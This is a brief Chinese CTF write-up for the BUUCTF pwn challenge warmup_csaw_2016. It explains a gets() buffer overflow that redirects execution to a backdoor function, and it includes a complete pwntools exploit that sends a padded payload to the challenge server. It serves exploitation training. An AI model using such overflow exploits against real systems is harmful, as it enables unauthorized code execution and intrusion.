BUUCTF-PWN-warmup_csaw_2016

checksec

image-20211103143900879

IDA

image-20211103143951559

image-20211103144018670

很明显可以通过gets函数溢出到后门函数。

v5的栈情况:

image-20211103144142224 image-20211103144209598

所以需要覆盖的是长度为(0x40 + 0x8)

EXP

1
2
3
4
5
6
7
8
from pwn import *

# p = process('./warmup_csaw_2016')
p = remote('node4.buuoj.cn', 25085)

payload = b'a' * (0x40 + 0x8) + p64(0x40060d)
p.sendline(payload)
p.interactive()

结果

image-20211103144348548